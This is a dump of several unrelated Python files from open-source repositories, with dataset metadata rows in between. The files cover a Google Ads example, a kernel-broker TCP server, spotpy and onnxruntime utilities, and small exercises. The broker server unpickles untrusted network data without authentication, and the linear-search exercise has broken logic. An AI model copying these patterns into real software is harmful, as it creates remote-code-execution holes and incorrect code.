def add_webpage_criterion(client, customer_id, ad_group_resource_name):
"""Creates a web page criterion to the given ad group.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
ad_group_resource_name: a resource_name str for an Ad Group.
"""
# Retrieve a new ad group criterion operation.
ad_group_criterion_operation = client.get_type(
'AdGroupCriterionOperation', version='v3')
# Create an ad group criterion for special offers for Mars Cruise.
criterion = ad_group_criterion_operation.create
criterion.ad_group.value = ad_group_resource_name
# Optional: set custom bid amount.
criterion.cpc_bid_micros.value = 10000000
# Optional: set the status.
criterion.status = client.get_type(
'AdGroupCriterionStatusEnum', version='v3').PAUSED
# Sets the criterion to match a specific page URL and title.
criterion.webpage.criterion_name.value = 'Special Offers'
webpage_info_url = criterion.webpage.conditions.add()
webpage_info_url.operand = client.get_type(
'WebpageConditionOperandEnum', version='v3').URL
webpage_info_url.argument.value = '/specialoffers'
webpage_info_page_title = criterion.webpage.conditions.add()
webpage_info_page_title.operand = client.get_type(
'WebpageConditionOperandEnum', version='v3').PAGE_TITLE
webpage_info_page_title.argument.value = 'Special Offer'
# Retrieve the ad group criterion service.
ad_group_criterion_service = client.get_service('AdGroupCriterionService',
version='v3')
# Issues a mutate request to add the ad group criterion.
response = ad_group_criterion_service.mutate_ad_group_criteria(
customer_id, [ad_group_criterion_operation])
resource_name = response.results[0].resource_name
print(f'Created Ad Group Criterion with resource_name: "{resource_name}"')
if __name__ == '__main__':
# GoogleAdsClient will read the google-ads.yaml configuration file in the
# home directory if none is specified.
google_ads_client = GoogleAdsClient.load_from_storage()
parser = argparse.ArgumentParser(
description=(
'Adds a dynamic search ad under the specified customer ID.'))
# The following argument(s) should be provided to run the example.
parser.add_argument('-c', '--customer_id', type=str,
required=True, help='The Google Ads customer ID.')
args = parser.parse_args()
main(google_ads_client, args.customer_id)
| 43.154135
| 80
| 0.706769
|
19ab3ebfa64027bf2c66726ecc920de4389e04e0
| 453
|
py
|
Python
|
BOOK/MAIN/02-strings-lists-tuples-dictionaries/chapter-2-examples/06-linear-search.py
|
kabirsrivastava3/python-practice
|
f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5
|
[
"MIT"
] | null | null | null |
BOOK/MAIN/02-strings-lists-tuples-dictionaries/chapter-2-examples/06-linear-search.py
|
kabirsrivastava3/python-practice
|
f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5
|
[
"MIT"
] | null | null | null |
BOOK/MAIN/02-strings-lists-tuples-dictionaries/chapter-2-examples/06-linear-search.py
|
kabirsrivastava3/python-practice
|
f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5
|
[
"MIT"
] | null | null | null |
#search for key in the dictionary and print the corresponding value
#Time Complexity = O(N)
def input(element):
return element
def findValue(inform,key):
if key in inform.values():
for search in inform:
return inform[search]== key
find = input("Ishpreet")
print(find)
info = {"Riya":"Csc.", "Mark":"Eco", "Ishpreet":"Eng", "Kamaal":"Env. Sc"}
output = findValue(info,find)
print(output)
| 22.65
| 74
| 0.613687
|
f967ec4e0e60b8d7590d116165faf624612733e6
| 799
|
py
|
Python
|
Lib/corpuscrawler/crawl_yut.py
|
cash/corpuscrawler
|
8913fe1fb2b6bfdfbf2ba01d2ce88057b3b5ba3d
|
[
"Apache-2.0"
] | 95
|
2019-06-13T23:34:21.000Z
|
2022-03-12T05:22:49.000Z
|
Lib/corpuscrawler/crawl_yut.py
|
sahwar/corpuscrawler
|
8913fe1fb2b6bfdfbf2ba01d2ce88057b3b5ba3d
|
[
"Apache-2.0"
] | 31
|
2019-06-02T18:56:53.000Z
|
2021-08-10T20:16:02.000Z
|
Lib/corpuscrawler/crawl_yut.py
|
sahwar/corpuscrawler
|
8913fe1fb2b6bfdfbf2ba01d2ce88057b3b5ba3d
|
[
"Apache-2.0"
] | 35
|
2019-06-18T08:26:24.000Z
|
2022-01-11T13:59:40.000Z
|
# coding: utf-8
# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function, unicode_literals
import re
def crawl(crawler):
out = crawler.get_output(language='yut')
crawler.crawl_pngscriptures_org(out, language='yut')
| 34.73913
| 74
| 0.764706
|
0ce3cbf0db2e0a1fcb33a029f7ae581085246fc6
| 3,188
|
py
|
Python
|
pykeval/pykeval/broker/remote_server.py
|
SilverTuxedo/keval
|
73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7
|
[
"MIT"
] | 34
|
2021-09-17T16:17:58.000Z
|
2022-03-11T06:23:21.000Z
|
pykeval/pykeval/broker/remote_server.py
|
fengjixuchui/keval
|
73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7
|
[
"MIT"
] | null | null | null |
pykeval/pykeval/broker/remote_server.py
|
fengjixuchui/keval
|
73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7
|
[
"MIT"
] | 4
|
2021-09-17T19:39:29.000Z
|
2022-03-10T07:06:43.000Z
|
import logging
import pickle
from socketserver import BaseRequestHandler, TCPServer
from pykeval.broker.local import LocalBroker
from pykeval.broker.requests import BrokerResponse, BrokerResponseType, BrokerRequest, BrokerRequestType
from pykeval.broker.messaging import receive, send
logger = logging.getLogger(__name__)
class BrokerRequestHandler(BaseRequestHandler):
broker_server = None
def handle(self) -> None:
logger.info(f"Got connection from {self.client_address}")
data = receive(self.request)
logger.debug("Received")
try:
request = pickle.loads(data)
# noinspection PyProtectedMember
response_data = self.__class__.broker_server._on_new_request(request)
response = BrokerResponse(BrokerResponseType.SUCCESS, response_data)
except Exception as e:
logger.exception("Error processing request")
response = BrokerResponse(BrokerResponseType.EXCEPTION, e)
logger.debug("Serializing and sending response")
serialized_response = pickle.dumps(response)
send(self.request, serialized_response)
logger.info(f"Sent response to {self.client_address}")
class RemoteBrokerServer:
"""
A broker server based on a local broker over TCP. This works together with `RemoteBroker` to allow running code on a
different machine than the client itself.
"""
def __init__(self, local_broker: LocalBroker, address: str, port: int):
"""
:param local_broker: The actual local broker that will handle requests
:param address: The address of the server
:param port: The port of the server
"""
self._local_broker = local_broker
self._address = address
self._port = port
def start(self):
"""
Starts the TCP server.
"""
handler_type = type("BoundBrokerRequestHandler", (BrokerRequestHandler,), {"broker_server": self})
with TCPServer((self._address, self._port), handler_type) as server:
logger.info(f"Starting server at {self._address}:{self._port}")
server.serve_forever()
def _on_new_request(self, request: BrokerRequest):
"""
Handles a broker request.
:return: What the local broker returned for the request
:raises ValueError if the request type is not supported.
"""
# No-data requests
if request.type == BrokerRequestType.GET_POINTER_SIZE:
return self._local_broker.get_pointer_size()
# Data requests
try:
handler = {
BrokerRequestType.CALL_FUNCTION: self._local_broker.call_function,
BrokerRequestType.READ_BYTES: self._local_broker.read_bytes,
BrokerRequestType.WRITE_BYTES: self._local_broker.write_bytes,
BrokerRequestType.ALLOCATE: self._local_broker.allocate,
BrokerRequestType.FREE: self._local_broker.free
}[request.type]
return handler(request.data)
except KeyError:
pass
raise ValueError(f"Unrecognized request type {request.type.value}")
| 35.820225
| 120
| 0.67064
|
4dcb9fcf60bb8270025fbfbcb309d7e6e03ebeb0
| 687
|
py
|
Python
|
Ch04. Recursion/is-palindrome.py
|
melfag/Problem-Solving-with-Algorithms-and-Data-Structures-using-Python
|
59b99b2ed439c5e2a97a364d1e743e36f0bf1ee3
|
[
"MIT"
] | 1
|
2020-07-21T11:29:39.000Z
|
2020-07-21T11:29:39.000Z
|
Ch04. Recursion/is-palindrome.py
|
melfag/Problem-Solving-with-Algorithms-and-Data-Structures-using-Python
|
59b99b2ed439c5e2a97a364d1e743e36f0bf1ee3
|
[
"MIT"
] | null | null | null |
Ch04. Recursion/is-palindrome.py
|
melfag/Problem-Solving-with-Algorithms-and-Data-Structures-using-Python
|
59b99b2ed439c5e2a97a364d1e743e36f0bf1ee3
|
[
"MIT"
] | null | null | null |
def isPalindrome(string: str)->bool:
if len(string) < 2:
return True
else:
if string[0] == string[len(string) - 1]:
return isPalindrome(string[1: len(string) - 1])
else:
return False
print(isPalindrome('kayak'))
print(isPalindrome('aibohphobia'))
# no slicing
def isPalindrome2(string: str, start: int, end: int)->bool:
if start >= end:
return True
else:
if string[start] == string[end]:
return isPalindrome2(string, start + 1, end - 1)
else:
return False
print(isPalindrome2('kayak', 0, len('kayak') - 1))
print(isPalindrome2('aibohphobia', 0, len('aibohphobia') - 1))
| 25.444444
| 62
| 0.58952
|
6d38432e97e50ca2b7c08b1e6f50631caa04a9fe
| 1,539
|
py
|
Python
|
awacs/route53domains.py
|
craigbruce/awacs
|
e1d0699409291f0ad586b86d6c55cfc54af70778
|
[
"BSD-2-Clause"
] | null | null | null |
awacs/route53domains.py
|
craigbruce/awacs
|
e1d0699409291f0ad586b86d6c55cfc54af70778
|
[
"BSD-2-Clause"
] | null | null | null |
awacs/route53domains.py
|
craigbruce/awacs
|
e1d0699409291f0ad586b86d6c55cfc54af70778
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2012-2013, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
from aws import Action
service_name = 'Amazon Route53 Domains'
prefix = 'route53domains'
class Route53DomainsAction(Action):
def __init__(self, action=None):
self.prefix = prefix
self.action = action
CheckDomainAvailability = Route53DomainsAction("CheckDomainAvailability")
DeleteTagsForDomain = Route53DomainsAction("DeleteTagsForDomain")
DisableDomainAutoRenew = Route53DomainsAction("DisableDomainAutoRenew")
DisableDomainTransferLock = Route53DomainsAction("DisableDomainTransferLock")
EnableDomainAutoRenew = Route53DomainsAction("EnableDomainAutoRenew")
EnableDomainTransferLock = Route53DomainsAction("EnableDomainTransferLock")
GetDomainDetail = Route53DomainsAction("GetDomainDetail")
GetOperationDetail = Route53DomainsAction("GetOperationDetail")
ListDomains = Route53DomainsAction("ListDomains")
ListOperations = Route53DomainsAction("ListOperations")
ListTagsForDomain = Route53DomainsAction("ListTagsForDomain")
RegisterDomain = Route53DomainsAction("RegisterDomain")
RetrieveDomainAuthCode = Route53DomainsAction("RetrieveDomainAuthCode")
TransferDomain = Route53DomainsAction("TransferDomain")
UpdateDomainContact = Route53DomainsAction("UpdateDomainContact")
UpdateDomainContactPrivacy = Route53DomainsAction("UpdateDomainContactPrivacy")
UpdateDomainNameservers = Route53DomainsAction("UpdateDomainNameservers")
UpdateTagsForDomains = Route53DomainsAction("UpdateTagsForDomains")
| 42.75
| 79
| 0.841455
|
b8493734b0b43009984763955820502d07cfb7d7
| 4,993
|
py
|
Python
|
spotpy/examples/tutorial_padds_hymod.py
|
hpsone/spotpy
|
34d1ad306b6f2f8faa95f010e6c4db98be76efaa
|
[
"MIT"
] | 1
|
2020-06-17T17:35:25.000Z
|
2020-06-17T17:35:25.000Z
|
spotpy/examples/tutorial_padds_hymod.py
|
YinZhaokai/spotpy
|
4b4eec4f3544dd710e5c823de9c351b077ce0d04
|
[
"MIT"
] | null | null | null |
spotpy/examples/tutorial_padds_hymod.py
|
YinZhaokai/spotpy
|
4b4eec4f3544dd710e5c823de9c351b077ce0d04
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Copyright 2015 by Tobias Houska
This file is part of Statistical Parameter Estimation Tool (SPOTPY).
:author: Tobias Houska
This class holds example code how to use the dream algorithm
'''
import numpy as np
try:
import spotpy
except ImportError:
import sys
sys.path.append(".")
import spotpy
from spotpy.examples.spot_setup_hymod_python_pareto import spot_setup
import pylab as plt
if __name__ == "__main__":
parallel ='seq' # Runs everthing in sequential mode
np.random.seed(2000) # Makes the results reproduceable
# Initialize the Hymod example
# In this case, we tell the setup which algorithm we want to use, so
# we can use this exmaple for different algorithms
spot_setup=spot_setup()
#Select number of maximum allowed repetitions
rep=3000
# Create the SCE-UA sampler of spotpy, alt_objfun is set to None to force SPOTPY
# to jump into the def objectivefunction in the spot_setup class (default is
# spotpy.objectivefunctions.rmse)
sampler=spotpy.algorithms.padds(spot_setup, dbname='padds_hymod', dbformat='csv')
#Start the sampler, one can specify ngs, kstop, peps and pcento id desired
print(sampler.sample(rep, metric="crowd_distance"))
# Load the results gained with the sceua sampler, stored in SCEUA_hymod.csv
#results = spotpy.analyser.load_csv_results('DDS_hymod')
results = sampler.getdata()
from pprint import pprint
#pprint(results)
pprint(results['chain'])
for likno in range(1,5):
fig_like1 = plt.figure(1,figsize=(9,5))
plt.plot(results['like'+str(likno)])
plt.show()
fig_like1.savefig('hymod_padds_objectivefunction_' + str(likno) + '.png', dpi=300)
plt.ylabel('RMSE')
plt.xlabel('Iteration')
# Example plot to show the parameter distribution ######
fig= plt.figure(2,figsize=(9,9))
normed_value = 1
plt.subplot(5,2,1)
x = results['parcmax']
for i in range(int(max(results['chain'])-1)):
index=np.where(results['chain']==i+1) #Ignores burn-in chain
plt.plot(x[index],'.')
plt.ylabel('cmax')
plt.ylim(spot_setup.cmax.minbound, spot_setup.cmax.maxbound)
plt.subplot(5,2,2)
x = x[int(len(results)*0.9):] #choose the last 10% of the sample
hist, bins = np.histogram(x, bins=20, density=True)
widths = np.diff(bins)
hist *= normed_value
plt.bar(bins[:-1], hist, widths)
plt.ylabel('cmax')
plt.xlim(spot_setup.cmax.minbound, spot_setup.cmax.maxbound)
plt.subplot(5,2,3)
x = results['parbexp']
for i in range(int(max(results['chain'])-1)):
index=np.where(results['chain']==i+1)
plt.plot(x[index],'.')
plt.ylabel('bexp')
plt.ylim(spot_setup.bexp.minbound, spot_setup.bexp.maxbound)
plt.subplot(5,2,4)
x = x[int(len(results)*0.9):]
hist, bins = np.histogram(x, bins=20, density=True)
widths = np.diff(bins)
hist *= normed_value
plt.bar(bins[:-1], hist, widths)
plt.ylabel('bexp')
plt.xlim(spot_setup.bexp.minbound, spot_setup.bexp.maxbound)
plt.subplot(5,2,5)
x = results['paralpha']
print(x)
for i in range(int(max(results['chain'])-1)):
index=np.where(results['chain']==i+1)
plt.plot(x[index],'.')
plt.ylabel('alpha')
plt.ylim(spot_setup.alpha.minbound, spot_setup.alpha.maxbound)
plt.subplot(5,2,6)
x = x[int(len(results)*0.9):]
hist, bins = np.histogram(x, bins=20, density=True)
widths = np.diff(bins)
hist *= normed_value
plt.bar(bins[:-1], hist, widths)
plt.ylabel('alpha')
plt.xlim(spot_setup.alpha.minbound, spot_setup.alpha.maxbound)
plt.subplot(5,2,7)
x = results['parKs']
for i in range(int(max(results['chain'])-1)):
index=np.where(results['chain']==i+1)
plt.plot(x[index],'.')
plt.ylabel('Ks')
plt.ylim(spot_setup.Ks.minbound, spot_setup.Ks.maxbound)
plt.subplot(5,2,8)
x = x[int(len(results)*0.9):]
hist, bins = np.histogram(x, bins=20, density=True)
widths = np.diff(bins)
hist *= normed_value
plt.bar(bins[:-1], hist, widths)
plt.ylabel('Ks')
plt.xlim(spot_setup.Ks.minbound, spot_setup.Ks.maxbound)
plt.subplot(5,2,9)
x = results['parKq']
for i in range(int(max(results['chain'])-1)):
index=np.where(results['chain']==i+1)
plt.plot(x[index],'.')
plt.ylabel('Kq')
plt.ylim(spot_setup.Kq.minbound, spot_setup.Kq.maxbound)
plt.xlabel('Iterations')
plt.subplot(5,2,10)
x = x[int(len(results)*0.9):]
hist, bins = np.histogram(x, bins=20, density=True)
widths = np.diff(bins)
hist *= normed_value
plt.bar(bins[:-1], hist, widths)
plt.ylabel('Kq')
plt.xlabel('Parameter range')
plt.xlim(spot_setup.Kq.minbound, spot_setup.Kq.maxbound)
plt.show()
fig.savefig('hymod_parameters.png',dpi=300)
| 30.445122
| 90
| 0.639495
|
45233dfc05fd7951089c6b29bd23ca2f8fdef0c3
| 27,930
|
py
|
Python
|
onnxruntime/python/tools/transformers/onnx_model.py
|
sriduth/onnxruntime
|
b2da700e4d953239833e40f9a1b39b15936cc6dd
|
[
"MIT"
] | 1
|
2019-01-15T18:10:37.000Z
|
2019-01-15T18:10:37.000Z
|
onnxruntime/python/tools/transformers/onnx_model.py
|
sriduth/onnxruntime
|
b2da700e4d953239833e40f9a1b39b15936cc6dd
|
[
"MIT"
] | null | null | null |
onnxruntime/python/tools/transformers/onnx_model.py
|
sriduth/onnxruntime
|
b2da700e4d953239833e40f9a1b39b15936cc6dd
|
[
"MIT"
] | 1
|
2021-03-08T18:50:34.000Z
|
2021-03-08T18:50:34.000Z
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
#--------------------------------------------------------------------------
from typing import List, Tuple
import logging
import os
import sys
import argparse
from pathlib import Path
import numpy as np
from collections import deque
from onnx import ModelProto, TensorProto, numpy_helper, helper, external_data_helper, save_model
logger = logging.getLogger(__name__)
class OnnxModel:
def __init__(self, model):
self.model = model
self.node_name_counter = {}
def input_name_to_nodes(self):
input_name_to_nodes = {}
for node in self.model.graph.node:
for input_name in node.input:
if input_name not in input_name_to_nodes:
input_name_to_nodes[input_name] = [node]
else:
input_name_to_nodes[input_name].append(node)
return input_name_to_nodes
def output_name_to_node(self):
output_name_to_node = {}
for node in self.model.graph.node:
for output_name in node.output:
output_name_to_node[output_name] = node
return output_name_to_node
def nodes(self):
return self.model.graph.node
def graph(self):
return self.model.graph
def remove_node(self, node):
if node in self.model.graph.node:
self.model.graph.node.remove(node)
def remove_nodes(self, nodes_to_remove):
for node in nodes_to_remove:
self.remove_node(node)
def add_node(self, node):
self.model.graph.node.extend([node])
def add_nodes(self, nodes_to_add):
self.model.graph.node.extend(nodes_to_add)
def add_initializer(self, tensor):
self.model.graph.initializer.extend([tensor])
def add_input(self, input):
self.model.graph.input.extend([input])
@staticmethod
def replace_node_input(node, old_input_name, new_input_name):
assert isinstance(old_input_name, str) and isinstance(new_input_name, str)
for j in range(len(node.input)):
if node.input[j] == old_input_name:
node.input[j] = new_input_name
def replace_input_of_all_nodes(self, old_input_name, new_input_name):
for node in self.model.graph.node:
OnnxModel.replace_node_input(node, old_input_name, new_input_name)
@staticmethod
def replace_node_output(node, old_output_name, new_output_name):
assert isinstance(old_output_name, str) and isinstance(new_output_name, str)
for j in range(len(node.output)):
if node.output[j] == old_output_name:
node.output[j] = new_output_name
def replace_output_of_all_nodes(self, old_output_name, new_output_name):
for node in self.model.graph.node:
OnnxModel.replace_node_output(node, old_output_name, new_output_name)
def get_initializer(self, name):
for tensor in self.model.graph.initializer:
if tensor.name == name:
return tensor
return None
def get_nodes_by_op_type(self, op_type):
return [n for n in self.model.graph.node if n.op_type == op_type]
def get_children(self, node, input_name_to_nodes=None):
if (input_name_to_nodes is None):
input_name_to_nodes = self.input_name_to_nodes()
children = []
for output in node.output:
if output in input_name_to_nodes:
for node in input_name_to_nodes[output]:
children.append(node)
return children
def get_parents(self, node, output_name_to_node=None):
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
parents = []
for input in node.input:
if input in output_name_to_node:
parents.append(output_name_to_node[input])
return parents
def get_parent(self, node, i, output_name_to_node=None):
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
if len(node.input) <= i:
return None
input = node.input[i]
if input not in output_name_to_node:
return None
return output_name_to_node[input]
def match_first_parent(self, node, parent_op_type, output_name_to_node, exclude=[]):
'''
Find parent node based on constraints on op_type.
Args:
node (str): current node name.
parent_op_type (str): constraint of parent node op_type.
output_name_to_node (dict): dictionary with output name as key, and node as value.
exclude (list): list of nodes that are excluded (not allowed to match as parent).
Returns:
parent: The matched parent node. None if not found.
index: The input index of matched parent node. None if not found.
'''
for i, input in enumerate(node.input):
if input in output_name_to_node:
parent = output_name_to_node[input]
if parent.op_type == parent_op_type and parent not in exclude:
return parent, i
else:
logger.debug(f"To find first {parent_op_type}, current {parent.op_type}")
return None, None
def match_parent(self,
node,
parent_op_type,
input_index=None,
output_name_to_node=None,
exclude=[],
return_indice=None):
'''
Find parent node based on constraints on op_type and index.
When input_index is None, we will find the first parent node based on constraints, and return_indice will be appended the corresponding input index.
Args:
node (str): current node name.
parent_op_type (str): constraint of parent node op_type.
input_index (int or None): only check the parent given input index of current node.
output_name_to_node (dict): dictionary with output name as key, and node as value.
exclude (list): list of nodes that are excluded (not allowed to match as parent).
return_indice (list): a list to append the input index when input_index is None.
Returns:
parent: The matched parent node.
'''
assert node is not None
assert input_index is None or input_index >= 0
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
if input_index is None:
parent, index = self.match_first_parent(node, parent_op_type, output_name_to_node, exclude)
if return_indice is not None:
return_indice.append(index)
return parent
if input_index >= len(node.input):
logger.debug(f"input_index {input_index} >= node inputs {len(node.input)}")
return None
parent = self.get_parent(node, input_index, output_name_to_node)
if parent is not None and parent.op_type == parent_op_type and parent not in exclude:
return parent
if parent is not None:
logger.debug(f"Expect {parent_op_type}, Got {parent.op_type}")
return None
def match_parent_paths(self, node, paths, output_name_to_node):
for i, path in enumerate(paths):
assert isinstance(path, List) or isinstance(path, Tuple)
return_indice = []
matched = self.match_parent_path(node, path[0], path[1], output_name_to_node, return_indice)
if matched:
return i, matched, return_indice
return -1, None, None
def match_parent_path(self,
node,
parent_op_types,
parent_input_index,
output_name_to_node=None,
return_indice=None):
'''
Find a sequence of input edges based on constraints on parent op_type and index.
When input_index is None, we will find the first parent node based on constraints, and return_indice will be appended the corresponding input index.
Args:
node (str): current node name.
parent_op_types (str): constraint of parent node op_type of each input edge.
parent_input_index (list): constraint of input index of each input edge. None means no constraint.
output_name_to_node (dict): dictionary with output name as key, and node as value.
return_indice (list): a list to append the input index when there is no constraint on input index of an edge.
Returns:
parents: a list of matched parent node.
'''
assert (len(parent_input_index) == len(parent_op_types))
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
current_node = node
matched_parents = []
for i, op_type in enumerate(parent_op_types):
matched_parent = self.match_parent(current_node,
op_type,
parent_input_index[i],
output_name_to_node,
exclude=[],
return_indice=return_indice)
if matched_parent is None:
logger.debug(f"Failed to match index={i} parent_input_index={parent_input_index[i]} op_type={op_type}",
stack_info=True)
return None
matched_parents.append(matched_parent)
current_node = matched_parent
return matched_parents
def find_first_child_by_type(self, node, child_type, input_name_to_nodes=None, recursive=True):
children = self.get_children(node, input_name_to_nodes)
dq = deque(children)
while len(dq) > 0:
current_node = dq.pop()
if current_node.op_type == child_type:
return current_node
if recursive:
children = self.get_children(current_node, input_name_to_nodes)
for child in children:
dq.appendleft(child)
return None
def find_first_parent_by_type(self, node, parent_type, output_name_to_node=None, recursive=True):
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
parents = self.get_parents(node, output_name_to_node)
dq = deque(parents)
while len(dq) > 0:
current_node = dq.pop()
if current_node.op_type == parent_type:
return current_node
if recursive:
parents = self.get_parents(current_node, output_name_to_node)
for parent in parents:
dq.appendleft(parent)
return None
def get_constant_value(self, output_name):
for node in self.get_nodes_by_op_type('Constant'):
if node.output[0] == output_name:
for att in node.attribute:
if att.name == 'value':
return numpy_helper.to_array(att.t)
# Fall back to intializer since constant folding might have been
# applied.
initializer = self.get_initializer(output_name)
if initializer is not None:
return numpy_helper.to_array(initializer)
return None
def get_constant_input(self, node):
for i, input in enumerate(node.input):
value = self.get_constant_value(input)
if value is not None:
return i, value
return None, None
def find_constant_input(self, node, expected_value, delta=0.000001):
i, value = self.get_constant_input(node)
if value is not None and value.size == 1 and abs(value - expected_value) < delta:
return i
return -1
def is_constant_with_specified_dimension(self, output_name, dimensions, description):
value = self.get_constant_value(output_name)
if value is None:
logger.debug(f"{description} {output_name} is not initializer.")
return False
if len(value.shape) != dimensions:
logger.debug(f"{description} {output_name} shall have {dimensions} dimensions. Got shape {value.shape}")
return False
return True
def has_constant_input(self, node, expected_value, delta=0.000001):
return self.find_constant_input(node, expected_value, delta) >= 0
def get_children_subgraph_nodes(self, root_node, stop_nodes, input_name_to_nodes=None):
if input_name_to_nodes is None:
input_name_to_nodes = self.input_name_to_nodes()
children = input_name_to_nodes[root_node.output[0]]
unique_nodes = []
dq = deque(children)
while len(dq) > 0:
current_node = dq.pop()
if current_node in stop_nodes:
continue
if current_node not in unique_nodes:
unique_nodes.append(current_node)
for output in current_node.output:
if output in input_name_to_nodes:
children = input_name_to_nodes[output]
for child in children:
dq.appendleft(child)
return unique_nodes
def tensor_shape_to_list(self, tensor_type):
""" Convert tensor shape to list
"""
shape_list = []
for d in tensor_type.shape.dim:
if (d.HasField("dim_value")):
shape_list.append(d.dim_value) # known dimension
elif (d.HasField("dim_param")):
shape_list.append(d.dim_param) # unknown dimension with symbolic name
else:
shape_list.append("?") # shall not happen
return shape_list
def convert_list_to_tensor(self, name, type, shape, value):
""" Convert list to tensor
"""
return helper.make_tensor(name, type, shape, value)
def change_input_output_float32_to_float16(self):
""" Change graph input and output data type from FLOAT to FLOAT16
"""
original_opset_version = self.model.opset_import[0].version
graph = self.graph()
new_graph_inputs = []
for input in graph.input:
if input.type.tensor_type.elem_type == TensorProto.FLOAT:
new_graph_inputs.append(
helper.make_tensor_value_info(input.name, TensorProto.FLOAT16,
self.tensor_shape_to_list(input.type.tensor_type)))
else:
new_graph_inputs.append(input)
new_graph_outputs = []
for output in graph.output:
if output.type.tensor_type.elem_type == TensorProto.FLOAT:
new_graph_outputs.append(
helper.make_tensor_value_info(output.name, TensorProto.FLOAT16,
self.tensor_shape_to_list(output.type.tensor_type)))
else:
new_graph_outputs.append(output)
graph_def = helper.make_graph(graph.node,
'float16 inputs and outputs',
new_graph_inputs,
new_graph_outputs,
initializer=graph.initializer,
value_info=graph.value_info)
self.model = helper.make_model(graph_def, producer_name='onnxruntime-tools')
# restore opset version
self.model.opset_import[0].version = original_opset_version
def convert_model_float32_to_float16(self, cast_input_output=True):
""" Convert a graph to FLOAT16
"""
graph = self.model.graph
initializers = graph.initializer
for initializer in initializers:
if initializer.data_type == 1:
initializer.CopyFrom(
numpy_helper.from_array(numpy_helper.to_array(initializer).astype(np.float16), initializer.name))
for node in graph.node:
if node.op_type in ['Constant', 'ConstantOfShape']:
for att in node.attribute:
if att.name == 'value' and att.t.data_type == 1:
att.CopyFrom(
helper.make_attribute(
"value", numpy_helper.from_array(numpy_helper.to_array(att.t).astype(np.float16))))
if node.op_type == 'Cast':
for att in node.attribute:
if att.name == 'to' and att.i == 1:
att.CopyFrom(helper.make_attribute("to", int(TensorProto.FLOAT16)))
if not cast_input_output:
self.change_input_output_float32_to_float16()
return
# Below assumes that we keep input and output data types.
# Add Cast node to convert input from float32 to float16.
for input_value_info in graph.input:
if input_value_info.type.tensor_type.elem_type == TensorProto.FLOAT:
initializer = self.get_initializer(input_value_info.name)
if initializer is not None: # for compatibility for old converter/exporter
input_value_info.type.tensor_type.elem_type = TensorProto.FLOAT16
else:
cast_input = input_value_info.name
cast_output = input_value_info.name + '_float16'
self.replace_input_of_all_nodes(cast_input, cast_output)
cast_node = helper.make_node('Cast', inputs=[cast_input], outputs=[cast_output])
cast_node.attribute.extend([helper.make_attribute("to", int(TensorProto.FLOAT16))])
self.add_node(cast_node)
# Add Cast node to convert output from float16 back to float32.
for output_value_info in graph.output:
if output_value_info.type.tensor_type.elem_type == TensorProto.FLOAT:
cast_input = output_value_info.name + '_float16'
cast_output = output_value_info.name
self.replace_output_of_all_nodes(cast_output, cast_input)
self.replace_input_of_all_nodes(cast_output, cast_input)
cast_node = helper.make_node('Cast', inputs=[cast_input], outputs=[cast_output])
cast_node.attribute.extend([helper.make_attribute("to", int(TensorProto.FLOAT))])
self.add_node(cast_node)
# create a new name for node
def create_node_name(self, op_type, name_prefix=None):
if op_type in self.node_name_counter:
self.node_name_counter[op_type] += 1
else:
self.node_name_counter[op_type] = 1
if name_prefix is not None:
full_name = name_prefix + str(self.node_name_counter[op_type])
else:
full_name = op_type + "_" + str(self.node_name_counter[op_type])
# Check whether the name is taken:
nodes = self.get_nodes_by_op_type(op_type)
for node in nodes:
if node.name == full_name:
raise Exception("Node name already taken:", full_name)
return full_name
def find_graph_input(self, input_name):
for input in self.model.graph.input:
if input.name == input_name:
return input
return None
def find_graph_output(self, output_name):
for output in self.model.graph.output:
if output.name == output_name:
return output
return None
def get_parent_subgraph_nodes(self, node, stop_nodes, output_name_to_node=None):
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
unique_nodes = []
parents = self.get_parents(node, output_name_to_node)
dq = deque(parents)
while len(dq) > 0:
current_node = dq.pop()
if current_node in stop_nodes:
continue
if current_node not in unique_nodes:
unique_nodes.append(current_node)
for input in current_node.input:
if input in output_name_to_node:
dq.appendleft(output_name_to_node[input])
return unique_nodes
def get_graph_inputs(self, current_node, recursive=False):
"""
Find graph inputs that linked to current node.
"""
graph_inputs = []
for input in current_node.input:
if self.find_graph_input(input) and input not in graph_inputs:
graph_inputs.append(input)
if recursive:
parent_nodes = self.get_parent_subgraph_nodes(current_node, [])
for node in parent_nodes:
for input in node.input:
if self.find_graph_input(input) and input not in graph_inputs:
graph_inputs.append(input)
return graph_inputs
@staticmethod
def input_index(node_output, child_node):
index = 0
for input in child_node.input:
if input == node_output:
return index
index += 1
return -1
def remove_unused_constant(self):
input_name_to_nodes = self.input_name_to_nodes()
#remove unused constant
unused_nodes = []
nodes = self.nodes()
for node in nodes:
if node.op_type == "Constant" and node.output[0] not in input_name_to_nodes:
unused_nodes.append(node)
self.remove_nodes(unused_nodes)
if len(unused_nodes) > 0:
logger.debug(f"Removed unused constant nodes: {len(unused_nodes)}")
def prune_graph(self, outputs=None):
"""
Prune graph to keep only required outputs. It removes unnecessary inputs and nodes.
Nodes are not linked (directly or indirectly) to any required output will be removed.
Args:
outputs (list): a list of graph outputs to retain. If it is None, all graph outputs will be kept.
"""
if outputs is None:
